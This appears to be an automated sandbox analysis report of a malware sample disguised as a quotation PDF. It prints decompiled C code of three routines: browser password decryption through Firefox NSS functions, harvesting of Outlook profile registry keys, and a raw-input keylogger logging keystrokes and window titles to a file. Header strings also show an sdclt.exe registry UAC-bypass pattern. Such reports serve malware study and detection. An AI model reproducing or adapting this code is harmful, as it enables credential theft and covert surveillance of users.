API ID: Process$CharCloseCurrentFileLowerModuleNameToken$ChangeDirectoryErrorFindFolderHandleInformationLastNotificationOpenPathSleepSpecialSystemWow64lstrcatlstrcmp
String ID: <$@$DelegateExecute$Software\Classes\Folder\shell\open\command$Software\Classes\Folder\shell\open\command$Software\Classes\Folder\shell\open\command$Software\Classes\Folder\shell\open\command$\Documents:ApplicationData$\sdclt.exe$cmd.exe /C C:\Windows\System32\sdclt.exe$open$test.vbs
API String ID: 2229834379-91630337
Opcode ID: 7692994b0d4e776f238a8c0686bc1f2f6213ba7b970e2c5c98dc7882c428a6c0
Instruction ID: 8c8fb586e324c673735280354c3cfda1b47fde775e0777d1dc26a6835601d39f
Opcode Fuzzy Hash: 7692994b0d4e776f238a8c0686bc1f2f6213ba7b970e2c5c98dc7882c428a6c0
Instruction Fuzzy Hash: 70615871E00218EBEB10EBA0EC4ABEE7778FF04305F51046AF605B6191DBB96A45CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00416D22 Relevance: 49.3, APIs: 8, Strings: 20, Instructions: 291
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416D22(intOrPtr __ecx, void* __eflags, char _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				long _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				signed int _v64;
				intOrPtr _v68;
				short _v588;
				void* _t173;
				struct HINSTANCE__* _t195;
				void* _t321;

				_t321 = __eflags;
				_v8 = __ecx;
				E0040132F( &_v588, 0, 0x104);
				_v52 = 0x104;
				GetCurrentDirectoryW(_v52,  &_v588);
				SetCurrentDirectoryW(E00406F44( &_a4));
				E00406C53( &_a4, _t321, "\\");
				E00406FBC( &_v48,  &_a4);
				E00406C53( &_v48, _t321, L"nss3.dll");
				E00406FBC( &_v28,  &_a4);
				E00406C53( &_v28, _t321, L"msvcr120.dll");
				E00406FBC( &_v24,  &_a4);
				E00406C53( &_v24, _t321, L"msvcp120.dll");
				E00406FBC( &_v44,  &_a4);
				E00406C53( &_v44, _t321, L"mozglue.dll");
				E00406FBC( &_v40,  &_a4);
				E00406C53( &_v40, _t321, L"softokn3.dll");
				E00406FBC( &_v36,  &_a4);
				E00406C53( &_v36, _t321, L"msvcp");
				E00406FBC( &_v32,  &_a4);
				E00406C53( &_v32, _t321, L"msvcr");
				_v12 = 0x5a;
				while(1) {
					_t31 =  &_v16; // 0x415846
					E00406FBC(_t31,  &_v36);
					_t33 =  &_v16; // 0x415846
					_v56 = E00406CDA(_t33, _t321, _v12);
					E00406C53(_v56, _t321, L".dll");
					_t36 =  &_v16; // 0x415846
					_t173 = E0041E9E4(_t36);
					_t322 = _t173;
					if(_t173 != 0) {
						break;
					}
					_v12 = _v12 + 0xa;
					E00406BE2();
					__eflags = _v12 - 0x96;
					if(_v12 != 0x96) {
						continue;
					}
					L4:
					_v12 = 0x5a;
					while(1) {
						E00406FBC( &_v20,  &_v32);
						_v60 = E00406CDA( &_v20, _t322, _v12);
						E00406C53(_v60, _t322, L".dll");
						if(E0041E9E4( &_v20) != 0) {
							break;
						}
						_v12 = _v12 + 0xa;
						E00406BE2();
						__eflags = _v12 - 0x96;
						if(__eflags != 0) {
							continue;
						}
						L8:
						 *((intOrPtr*)(_v8 + 0xc4)) = LoadLibraryW(E00406F44( &_v28));
						 *((intOrPtr*)(_v8 + 0xc8)) = LoadLibraryW(E00406F44( &_v24));
						 *((intOrPtr*)(_v8 + 0xcc)) = LoadLibraryW(E00406F44( &_v44));
						 *((intOrPtr*)(_v8 + 0xd0)) = LoadLibraryW(E00406F44( &_v48));
						_t195 = LoadLibraryW(E00406F44( &_v40));
						_t280 = _v8;
						 *(_v8 + 0xd4) = _t195;
						if( *((intOrPtr*)(_v8 + 0xc8)) == 0 ||  *((intOrPtr*)(_v8 + 0xcc)) == 0 ||  *((intOrPtr*)(_v8 + 0xd0)) == 0 ||  *(_v8 + 0xd4) == 0) {
							_v64 = _v64 & 0x00000000;
							E00406BE2();
							E00406BE2();
							E00406BE2();
							E00406BE2();
							E00406BE2();
							E00406BE2();
							E00406BE2();
							E00406BE2();
							return _v64;
						} else {
							 *((intOrPtr*)(_v8 + 0x84)) = E0041FF80(_t280, __eflags,  *((intOrPtr*)(_v8 + 0xd0)), "NSS_Init", 0);
							 *((intOrPtr*)(_v8 + 0x9c)) = E0041FF80(_v8, __eflags,  *((intOrPtr*)(_v8 + 0xd0)), "PK11_GetInternalKeySlot", 0);
							 *((intOrPtr*)(_v8 + 0x98)) = E0041FF80(_v8, __eflags,  *((intOrPtr*)(_v8 + 0xd0)), "PK11_Authenticate", 0);
							 *((intOrPtr*)(_v8 + 0x8c)) = E0041FF80(_v8, __eflags,  *((intOrPtr*)(_v8 + 0xd0)), "PK11SDR_Decrypt", 0);
							 *((intOrPtr*)(_v8 + 0x90)) = E0041FF80(_v8, __eflags,  *((intOrPtr*)(_v8 + 0xd0)), "NSSBase64_DecodeBuffer", 0);
							 *((intOrPtr*)(_v8 + 0x94)) = E0041FF80(_v8, __eflags,  *((intOrPtr*)(_v8 + 0xd0)), "PK11_CheckUserPassword", 0);
							 *((intOrPtr*)(_v8 + 0x88)) = E0041FF80(_v8, __eflags,  *((intOrPtr*)(_v8 + 0xd0)), "NSS_Shutdown", 0);
							 *((intOrPtr*)(_v8 + 0xa0)) = E0041FF80(_v8, __eflags,  *((intOrPtr*)(_v8 + 0xd0)), "PK11_FreeSlot", 0);
							 *((intOrPtr*)(_v8 + 0xa4)) = E0041FF80(_v8, __eflags,  *((intOrPtr*)(_v8 + 0xd0)), "PR_GetError", 0);
							SetCurrentDirectoryW( &_v588);
							_v68 = 1;
							E00406BE2();
							E00406BE2();
							E00406BE2();
							E00406BE2();
							E00406BE2();
							E00406BE2();
							E00406BE2();
							E00406BE2();
							return _v68;
						}
					}
					E00406BFC( &_v28,  &_v20);
					E00406BE2();
					goto L8;
				}
				_t37 =  &_v16; // 0x415846
				E00406BFC( &_v24, _t37);
				E00406BE2();
				goto L4;
			}

0x00416d22
0x00416d2b
0x00416d3c
0x00416d44
0x00416d55
0x00416d64
0x00416d72
0x00416d7e
0x00416d8b
0x00416d97
0x00416da4
0x00416db0
0x00416dbd
0x00416dc9
0x00416dd6
0x00416de2
0x00416def
0x00416dfb
0x00416e08
0x00416e14
0x00416e21
0x00416e26
0x00416e2d
0x00416e31
0x00416e34
0x00416e3c
0x00416e44
0x00416e4f
0x00416e54
0x00416e58
0x00416e5e
0x00416e60
0x00000000
0x00000000
0x00416e7e
0x00416e84
0x00416e89
0x00416e90
0x00000000
0x00000000
0x00416e92
0x00416e92
0x00416e99
0x00416ea0
0x00416eb0
0x00416ebb
0x00416ecc
0x00000000
0x00000000
0x00416eea
0x00416ef0
0x00416ef5
0x00416efc
0x00000000
0x00000000
0x00416efe
0x00416f10
0x00416f28
0x00416f40
0x00416f58
0x00416f67
0x00416f6d
0x00416f70
0x00416f80
0x00416fa6
0x00416fad
0x00416fb5
0x00416fbd
0x00416fc5
0x00416fcd
0x00416fd5
0x00416fdd
0x00416fe5
0x00000000
0x00416ff2
0x0041700d
0x0041702e
0x0041704f
0x00417070
0x00417091
0x004170b2
0x004170d3
0x004170f4
0x00417115
0x00417122
0x00417128
0x00417132
0x0041713a
0x00417142
0x0041714a
0x00417152
0x0041715a
0x00417162
0x0041716a
0x00000000
0x0041716f
0x00416f80
0x00416ed5
0x00416edd
0x00000000
0x00416edd
0x00416e62
0x00416e69
0x00416e71
0x00000000

APIs

GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00416D55
SetCurrentDirectoryW.KERNEL32(00000000), ref: 00416D64

Part of subcall function 00406FBC: lstrcpyW.KERNEL32 ref: 00406FF9

Part of subcall function 00406CDA: wsprintfW.USER32 ref: 00406CF5

Part of subcall function 0041E9E4: PathFileExistsW.SHLWAPI(00000000,?,00405C98,?,?,?,00000000,00000000), ref: 0041E9F0

LoadLibraryW.KERNEL32(00000000,.dll,0000005A,?,.dll,0000005A,?,msvcr,?,msvcp,?,softokn3.dll,?,mozglue.dll,?,msvcp120.dll), ref: 00416F07
LoadLibraryW.KERNEL32(00000000), ref: 00416F1F
LoadLibraryW.KERNEL32(00000000), ref: 00416F37
LoadLibraryW.KERNEL32(00000000), ref: 00416F4F
LoadLibraryW.KERNEL32(00000000), ref: 00416F67

Part of subcall function 00406BFC: lstrcpyW.KERNEL32 ref: 00406C46

SetCurrentDirectoryW.KERNEL32(?), ref: 00417122

Strings

NSS_Init, xrefs: 00416FF4
NSSBase64_DecodeBuffer, xrefs: 00417078
msvcp120.dll, xrefs: 00416DB5
msvcr, xrefs: 00416E19
PR_GetError, xrefs: 004170FC
msvcp, xrefs: 00416E00
PK11_CheckUserPassword, xrefs: 00417099
PK11_FreeSlot, xrefs: 004170DB
.dll, xrefs: 00416E47
PK11_Authenticate, xrefs: 00417036
msvcr120.dll, xrefs: 00416D9C
PK11SDR_Decrypt, xrefs: 00417057
FXAZ, xrefs: 00416E31, 00416E3C, 00416E54, 00416E81, 00416E62, 00416E6E, 00416E57, 00416E65
nss3.dll, xrefs: 00416D83
.dll, xrefs: 00416EB3
softokn3.dll, xrefs: 00416DE7
mozglue.dll, xrefs: 00416DCE
PK11_GetInternalKeySlot, xrefs: 00417015
NSS_Shutdown, xrefs: 004170BA
Z, xrefs: 00416E92

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: LibraryLoad$CurrentDirectory$lstrcpy$ExistsFilePathwsprintf
String ID: .dll$.dll$FXAZ$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$PR_GetError$Z$mozglue.dll$msvcp$msvcp120.dll$msvcr$msvcr120.dll$nss3.dll$softokn3.dll
API String ID: 2954349370-3937474392
Opcode ID: 37d0ed6b24b21757bc1aa49bc047a3de89b0962e48bce7c3376a7f92702fc81f
Instruction ID: b4e8730a75dbceed0dfcdd7a50dc84b7c47196c96a33fb02239ced70ae8dfe99
Opcode Fuzzy Hash: 37d0ed6b24b21757bc1aa49bc047a3de89b0962e48bce7c3376a7f92702fc81f
Instruction Fuzzy Hash: BEC12B71900118ABCB04EF91DC56BED77B4BF14308F6140BEE506BA1D2EF796A5ACB18

Uniqueness

Uniqueness Score: -1.00%

Function 00415097 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 170
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00415097(intOrPtr __ecx, void* __eflags) {
				void* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				short _v4120;
				short _v8216;
				short _v12312;
				char _v16408;
				int _t49;
				int _t51;
				int _t53;
				int _t65;
				int _t83;
				int _t85;
				intOrPtr _t96;

				_t96 = __ecx;
				E004012A0(0x4014, __ecx);
				_v24 = _t96;
				E0040132F( &_v4120, 0, 0x800);
				E0040132F( &_v8216, 0, 0x800);
				if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Office\\15.0Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8) != 0) {
					_t49 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
					__eflags = _t49;
					if(_t49 != 0) {
						_t51 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
						__eflags = _t51;
						if(_t51 != 0) {
							_t53 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
							__eflags = _t53;
							if(_t53 != 0) {
								return 0;
							}
							lstrcpyW( &_v4120, L"Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
							L9:
							if(RegQueryInfoKeyW(_v8, 0, 0, 0,  &_v20,  &_v16, 0, 0, 0, 0, 0, 0) == 0) {
								_v12 = _v12 & 0x00000000;
								while(1) {
									__eflags = _v12 - _v20;
									if(_v12 >= _v20) {
										break;
									}
									_v16 = 0x800;
									_t65 = RegEnumKeyExW(_v8, _v12,  &_v12312,  &_v16, 0, 0, 0, 0);
									__eflags = _t65;
									if(_t65 == 0) {
										RegCloseKey(_v8);
										lstrcpyW( &_v8216,  &_v4120);
										lstrcatW( &_v8216, "\\");
										lstrcatW( &_v8216,  &_v12312);
										__eflags = RegOpenKeyExW(0x80000001,  &_v8216, 0, 0xf003f,  &_v8);
										if(__eflags == 0) {
											_push( &_v16408);
											E004152D3(_v24, __eflags, _v8);
											RegCloseKey(_v8);
											_t83 = RegOpenKeyExW(0x80000001,  &_v4120, 0, 0xf003f,  &_v8);
											__eflags = _t83;
											if(_t83 == 0) {
												_t85 = _v12 + 1;
												__eflags = _t85;
												_v12 = _t85;
												continue;
											}
											return 0;
										}
										return 0;
									}
									return 0;
								}
								__eflags = 1;
								return 1;
							}
							return 0;
						}
						lstrcpyW( &_v4120, L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676");
						goto L9;
					}
					lstrcpyW( &_v4120, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
					goto L9;
				}
				lstrcpyW( &_v4120, L"Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
				goto L9;
			}

0x00415097
0x0041509f
0x004150a4
0x004150b5
0x004150cb
0x004150f0
0x0041511e
0x00415124
0x00415126
0x00415151
0x00415157
0x00415159
0x00415184
0x0041518a
0x0041518c
0x00000000
0x004151a2
0x0041519a
0x004151a9
0x004151ce
0x004151d7
0x004151e4
0x004151e7
0x004151ea
0x00000000
0x00000000
0x004151f0
0x00415210
0x00415216
0x00415218
0x00415224
0x00415238
0x0041524a
0x0041525e
0x00415281
0x00415283
0x0041528f
0x00415296
0x0041529e
0x004152bb
0x004152c1
0x004152c3
0x004151e0
0x004151e0
0x004151e1
0x00000000
0x004151e1
0x00000000
0x004152c5
0x00000000
0x00415285
0x00000000
0x0041521a
0x004152d0
0x00000000
0x004152d0
0x00000000
0x004151d0
0x00415167
0x00000000
0x00415167
0x00415134
0x00000000
0x00415134
0x004150fe
0x00000000

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 004150E8
lstrcpyW.KERNEL32 ref: 004150FE
RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 0041511E
lstrcpyW.KERNEL32 ref: 00415134
RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004151C6
RegEnumKeyExW.ADVAPI32(?,00000000,?,00000800,00000000,00000000,00000000,00000000), ref: 00415210
RegCloseKey.ADVAPI32(?), ref: 00415224
lstrcpyW.KERNEL32 ref: 00415238
lstrcatW.KERNEL32(?,00428764), ref: 0041524A
lstrcatW.KERNEL32(?,?), ref: 0041525E
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 0041527B

Strings

Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 004150F2
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0041518E
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00415128
Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 004150DE
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0041517A
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676, xrefs: 00415147
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676, xrefs: 0041515B
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00415114

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Openlstrcpy$lstrcat$CloseEnumInfoQuery
String ID: Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
API String ID: 999015188-3328533648
Opcode ID: 6319a3acbfc4988bb1ef84c1580c7e27943c4ef2bc158f4974cd03efa291060b
Instruction ID: bc703be08f83491fcde639b671b918ad1ef4683aea2cc4648aaa2191e50aac11
Opcode Fuzzy Hash: 6319a3acbfc4988bb1ef84c1580c7e27943c4ef2bc158f4974cd03efa291060b
Instruction Fuzzy Hash: E0513E71B40208FBEB21DB90DD45FEE777CAB04701FA004A6B705F6091DB789A85AB29

Uniqueness

Uniqueness Score: -1.00%

Function 00413193 Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 348
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00413193(void* __ecx, void* __eflags, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v21;
				int _v28;
				char _v32;
				char _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				struct HWND__* _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v80;
				WCHAR* _v84;
				WCHAR* _v88;
				WCHAR* _v92;
				WCHAR* _v96;
				void* _v100;
				DWORD* _v104;
				int _v108;
				void* _v112;
				DWORD* _v116;
				int _v120;
				void* _v124;
				DWORD* _v128;
				long _v132;
				void* _v136;
				void* _v140;
				DWORD* _v144;
				int _v148;
				void* _v152;
				DWORD* _v156;
				int _v160;
				void* _v164;
				DWORD* _v168;
				long _v172;
				void* _v176;
				void* _v180;
				signed int _v184;
				long _v188;
				signed int _v192;
				long _v196;
				struct HWND__* _v200;
				intOrPtr _v204;
				short _v206;
				char _v208;
				char _v244;
				short _v764;
				short _t163;
				signed int* _t168;
				signed int* _t171;
				int _t177;
				signed int* _t185;
				signed int* _t188;
				signed int* _t189;
				signed int* _t193;
				int _t195;
				signed int* _t197;
				signed int* _t200;
				signed int* _t203;
				signed int* _t204;
				signed int* _t205;
				signed int _t211;
				signed int* _t215;
				signed int* _t218;
				signed int* _t220;
				signed int* _t223;
				signed int* _t226;
				signed int* _t229;
				signed int* _t232;
				signed int* _t237;
				signed int* _t240;
				signed int* _t243;
				signed int* _t246;
				signed int _t247;
				signed int* _t249;
				signed int* _t252;
				signed int* _t258;
				signed int* _t261;
				signed int* _t262;
				signed int* _t264;
				signed int* _t293;
				signed int* _t304;
				void* _t315;
				void* _t316;

				_v196 = _a16;
				_v21 = 0;
				_v16 = _v16 & 0x00000000;
				E0040132F( &_v764, 0, 0x208);
				_t316 = _t315 + 0xc;
				E00406F52( &_v8);
				_v28 = _a8;
				if(_v28 == 1) {
					_v196 = _a16;
					_v204 = 0x130;
					_v208 = 1;
					_t163 = 6;
					_v206 = _t163;
					_v200 = _a4;
					__imp__RegisterRawInputDevices( &_v208, 1, 0xc);
					L31:
					_t151 =  &_v192;
					 *_t151 = _v192 & 0x00000000;
					__eflags =  *_t151;
					E00406BE2();
					return _v192;
				}
				if(_v28 == 0x10) {
					PostQuitMessage(0);
					goto L31;
				}
				if(_v28 == 0xff) {
					_t168 =  &_v16;
					__imp__GetRawInputData(_a16, 0x10000003, 0, _t168, 0x10);
					__eflags = _t168 - 0xffffffff;
					if(_t168 != 0xffffffff) {
						_v48 = E0040B8D1(_v16);
						_v12 = _v48;
						__eflags = _v12;
						if(_v12 != 0) {
							_t171 =  &_v16;
							__imp__GetRawInputData(_a16, 0x10000003, _v12, _t171, 0x10);
							__eflags = _t171 - _v16;
							if(_t171 == _v16) {
								_v20 = _v12;
								_v56 =  *((intOrPtr*)(_v20 + 0x18));
								__eflags = _v56 - 0x100;
								if(_v56 != 0x100) {
									L28:
									goto L31;
								}
								_v60 = GetForegroundWindow();
								_t177 = GetWindowTextW(_v60,  &_v764, 0x104);
								__eflags = _t177;
								if(_t177 <= 0) {
									E00406A11( &_v8, L"Unknow");
								} else {
									E00406BFC( &_v8, E00406F64( &_v64,  &_v764));
									E00406BE2();
								}
								E0041398F(__eflags,  &_v44,  *(_v20 + 0x16) & 0x000000ff);
								E00406BFC( &_v44,  &_v8);
								_t185 =  *0x42cc9c; // 0x0
								E00406C53( &_v32, __eflags,  &(_t185[4]));
								_t188 =  *0x42cc9c; // 0x0
								__eflags =  *_t188;
								if( *_t188 != 0) {
									_t304 =  *0x42cc9c; // 0x0
									_v72 = E00413F0C(_t304);
									_t264 =  *0x42cc9c; // 0x0
									__eflags =  &(_t264[0x286]);
									E00401811(_t316 - 0x10,  &(_t264[0x286]),  &(_t264[0x286]));
									E00402EF8(_t316,  &_v44);
									_v68 = E00408F59( &_v244, __eflags);
									E00409811(_v72, _v68);
									E00408F29( &_v244);
								}
								_t189 =  *0x42cc9c; // 0x0
								__eflags = _t189[0x285];
								if(_t189[0x285] == 0) {
									L27:
									_v184 = _v12;
									E0040B881(_v184);
									E00402EB2( &_v44);
									goto L28;
								} else {
									_t193 =  *0x42cc9c; // 0x0
									_t195 = lstrlenW( &(_t193[0x84]));
									__eflags = _t195;
									if(_t195 == 0) {
										_v92 = E00406F44( &_v44);
										_t197 =  *0x42cc9c; // 0x0
										_v96 =  &(_t197[0x84]);
										lstrcpyW(_v96, _v92);
										_t200 =  *0x42cc9c; // 0x0
										_t81 =  &(_t200[0x284]);
										 *_t81 = _t200[0x284] & 0x00000000;
										__eflags =  *_t81;
									} else {
										_t252 =  *0x42cc9c; // 0x0
										_v80 = E004069E1( &_v8, E00406F64( &_v76,  &(_t252[0x84])));
										E00406BE2();
										__eflags = _v80;
										if(_v80 == 0) {
											_v84 = E00406F44( &_v44);
											_t258 =  *0x42cc9c; // 0x0
											_v88 =  &(_t258[0x84]);
											lstrcpyW(_v88, _v84);
											_t261 =  *0x42cc9c; // 0x0
											_t74 =  &(_t261[0x284]);
											 *_t74 = _t261[0x284] & 0x00000000;
											__eflags =  *_t74;
										} else {
											_t262 =  *0x42cc9c; // 0x0
											_t262[0x284] = 1;
										}
									}
									_t293 =  *0x42cc9c; // 0x0
									_v100 = CreateFileW(E00406F44( &(_t293[3])), 4, 1, 0, 4, 0x80, 0);
									_t203 =  *0x42cc9c; // 0x0
									_t203[1] = _v100;
									_t204 =  *0x42cc9c; // 0x0
									__eflags = _t204[0x284];
									if(__eflags == 0) {
										_t220 =  *0x42cc9c; // 0x0
										_v104 =  &(_t220[2]);
										_v108 = lstrlenW(L"\r\n");
										_t223 =  *0x42cc9c; // 0x0
										_v112 = _t223[1];
										WriteFile(_v112, L"\r\n", _v108, _v104, 0);
										_t226 =  *0x42cc9c; // 0x0
										_v116 =  &(_t226[2]);
										_v120 = lstrlenW(L"\r\n");
										_t229 =  *0x42cc9c; // 0x0
										_v124 = _t229[1];
										WriteFile(_v124, L"\r\n", _v120, _v116, 0);
										_t232 =  *0x42cc9c; // 0x0
										_v128 =  &(_t232[2]);
										_v132 = E00406F1B( &_v44) << 1;
										_v136 = E00406F44( &_v44);
										_t237 =  *0x42cc9c; // 0x0
										_v140 = _t237[1];
										WriteFile(_v140, _v136, _v132, _v128, 0);
										_t240 =  *0x42cc9c; // 0x0
										_v144 =  &(_t240[2]);
										_v148 = lstrlenW(L"\r\n");
										_t243 =  *0x42cc9c; // 0x0
										_v152 = _t243[1];
										WriteFile(_v152, L"\r\n", _v148, _v144, 0);
										_t246 =  *0x42cc9c; // 0x0
										_t247 =  &(_t246[2]);
										__eflags = _t247;
										_v156 = _t247;
										_v160 = lstrlenW(L"\r\n");
										_t249 =  *0x42cc9c; // 0x0
										_v164 = _t249[1];
										WriteFile(_v164, L"\r\n", _v160, _v156, 0);
									}
									_t205 =  *0x42cc9c; // 0x0
									_v168 =  &(_t205[2]);
									_t211 = lstrlenW(E004136E8(__eflags,  *(_v20 + 0x16) & 0x000000ff)) << 1;
									__eflags = _t211;
									_v172 = _t211;
									_v176 = E004136E8(_t211,  *(_v20 + 0x16) & 0x000000ff);
									_t215 =  *0x42cc9c; // 0x0
									_v180 = _t215[1];
									WriteFile(_v180, _v176, _v172, _v168, 0);
									_t218 =  *0x42cc9c; // 0x0
									CloseHandle(_t218[1]);
									goto L27;
								}
							}
							_v52 = _v12;
							E0040B881(_v52);
							goto L31;
						}
						goto L31;
					}
					goto L31;
				}
				_v188 = DefWindowProcA(_a4, _a8, _a12, _a16);
				E00406BE2();
				return _v188;
			}

0x0041319f
0x004131a5
0x004131a9
0x004131bb
0x004131c0
0x004131c6
0x004131ce
0x004131d5
0x004131f2
0x004131f8
0x00413205
0x0041320e
0x0041320f
0x00413219
0x0041322a
0x004136cf
0x004136cf
0x004136cf
0x004136cf
0x004136d9
0x00000000
0x004136de
0x004131db
0x0041369f
0x00000000
0x0041369f
0x004131e8
0x00413237
0x00413245
0x0041324b
0x0041324e
0x0041325e
0x00413264
0x00413267
0x0041326b
0x00413274
0x00413283
0x00413289
0x0041328c
0x004132a5
0x004132ae
0x004132b1
0x004132b8
0x0041369b
0x00000000
0x0041369b
0x004132c4
0x004132d6
0x004132dc
0x004132de
0x0041330a
0x004132e0
0x004132f3
0x004132fb
0x004132fb
0x0041331b
0x00413329
0x0041332e
0x0041333a
0x0041333f
0x00413344
0x00413347
0x00413349
0x00413354
0x0041335c
0x00413361
0x00413367
0x00413375
0x00413385
0x0041338e
0x00413399
0x00413399
0x0041339e
0x004133a3
0x004133aa
0x0041367e
0x00413681
0x0041368d
0x00413696
0x00000000
0x004133b0
0x004133b0
0x004133bb
0x004133c1
0x004133c3
0x0041343d
0x00413440
0x0041344a
0x00413453
0x00413459
0x0041345e
0x0041345e
0x0041345e
0x004133c5
0x004133c5
0x004133e1
0x004133e7
0x004133ec
0x004133f0
0x0041340b
0x0041340e
0x00413418
0x00413421
0x00413427
0x0041342c
0x0041342c
0x0041342c
0x004133f2
0x004133f2
0x004133f7
0x004133f7
0x00413433
0x00413474
0x00413489
0x0041348c
0x00413494
0x00413497
0x0041349c
0x004134a3
0x004134a9
0x004134b1
0x004134bf
0x004134c2
0x004134ca
0x004134dd
0x004134e3
0x004134eb
0x004134f9
0x004134fc
0x00413504
0x00413517
0x0041351d
0x00413525
0x00413532
0x0041353d
0x00413543
0x0041354b
0x00413565
0x0041356b
0x00413573
0x00413584
0x0041358a
0x00413592
0x004135b1
0x004135b7
0x004135bc
0x004135bc
0x004135bf
0x004135d0
0x004135d6
0x004135de
0x004135fd
0x004135fd
0x00413603
0x0041360b
0x00413626
0x00413626
0x00413628
0x0041363c
0x00413642
0x0041364a
0x0041366a
0x00413670
0x00413678
0x00000000
0x00413678
0x004133aa
0x00413291
0x00413297
0x00000000
0x0041329c
0x00000000
0x0041326d
0x00000000
0x00413250
0x004136b9
0x004136c2
0x00000000

APIs

RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 0041322A
GetRawInputData.USER32(?,10000003,00000000,00000000,00000010), ref: 00413245
PostQuitMessage.USER32(00000000), ref: 0041369F
DefWindowProcA.USER32(?,00000000,?,?), ref: 004136B3

Strings

Unknow, xrefs: 00413302

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

